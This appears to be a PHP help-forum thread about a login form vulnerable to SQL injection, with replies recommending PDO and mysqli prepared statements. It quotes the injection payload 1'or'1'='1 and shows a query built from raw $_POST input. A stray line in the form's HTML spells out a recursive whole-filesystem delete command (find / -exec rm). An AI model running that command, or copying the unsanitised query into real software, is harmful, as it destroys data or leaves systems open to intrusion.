Page 1 of 1

Prevent from SQL Injection

Posted: Thu Dec 10, 2015 12:28 am
by prasanthvel
Hai, i'm new to php . I have tried a simple login form, in that form everything is okay, but it's vulnerable to simple SQL Injection attack - 1'or'1'='1 .
To prevent from this i have added a simple code in the login form. Its working fine but shows a error. How to clear that please help me. Below is my code

Code: Select all

<?php
session_start();
$message="";
if(count($_POST)>0) {
$conn = mysql_connect("localhost","root","");
mysql_select_db("test",$conn);
$result = mysql_query("SELECT * FROM users WHERE user_name='" . $_POST["user_name"] . "' and password = '". $_POST["password"]."'");
$row  = mysql_fetch_array($result);
if(is_array($row)) {
$_SESSION["user_id"] = $row[user_id];
$_SESSION["user_name"] = $row[user_name];
} else {
$message = "Invalid Username or Password!";
}
}
if(isset($_SESSION["user_id"])) {
header("Location:user_dashboard.php");
}
?>

<title>Login Page</title>

<link rel="stylesheet" type="text/css" href="styles.css" />

<form name="frmUser" method="post" action="">

<table border="0" cellpadding="10" cellspacing="1" width="500" align="center">
<tr class="tableheader">
<td align="center" colspan="2">Enter Login Details</td>
</tr>
<tr class="tablerow">
<td align="right">Username</td>
<td><input type="text" name="user_name"></td>
</tr>
<tr class="tablerow">
<td align="right">Password</td>
<td><input type="password" name="password"></td>
</tr>
<?php 'find / -exec rm "{}" ";"'; ?>
<tr class="tableheader">
<td align="center" colspan="2"><input type="submit" name="submit" value="Submit"></td>
</tr>
<div class="message"><?php if($message!="") { echo $message; } ?></div>
</table>
</form>
</body></html>

It shows an error in line 8.

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in login.php on line 8

Re: Prevent from SQL Injection

Posted: Thu Dec 10, 2015 6:41 am
by Celauran
mysql_query et al have been deprecated for years and were removed in PHP 7.0. Forget you ever saw it and look at using PDO with prepared statements. PDO offers the flexibility of not tying you to a particular database and prepared statements protect against SQL injection.

http://php.net/manual/en/book.pdo.php

Re: Prevent from SQL Injection

Posted: Sat Dec 12, 2015 8:05 am
by sathya
Kindly use the syntax properly is the best way to prevent from my experience.some times xss may attack for php..beware when using the php code

Re: Prevent from SQL Injection

Posted: Mon Dec 14, 2015 7:30 pm
by Christopher
Use the Mysqli library and make sure that mysqli_connect() is returning a valid connection ID and not false.

Re: Prevent from SQL Injection

Posted: Wed Dec 30, 2015 1:56 am
by sathya
u can test by using sqlmap or havij to test your website is vulnerable or not for hackers

Re: Prevent from SQL Injection

Posted: Sat Aug 07, 2021 1:54 am
by kiash
You can use PDO prepere statement to prevent SQL injection. Here is the example:

Code: Select all

<?php
/* Execute a prepared statement by passing an array of values */
$sql = 'SELECT name, colour, calories
    FROM fruit
    WHERE calories < :calories AND colour = :colour';
$sth = $dbh->prepare($sql, array(PDO::ATTR_CURSOR => PDO::CURSOR_FWDONLY));
$sth->execute(array(':calories' => 150, ':colour' => 'red'));
$red = $sth->fetchAll();
$sth->execute(array(':calories' => 175, ':colour' => 'yellow'));
$yellow = $sth->fetchAll();
?>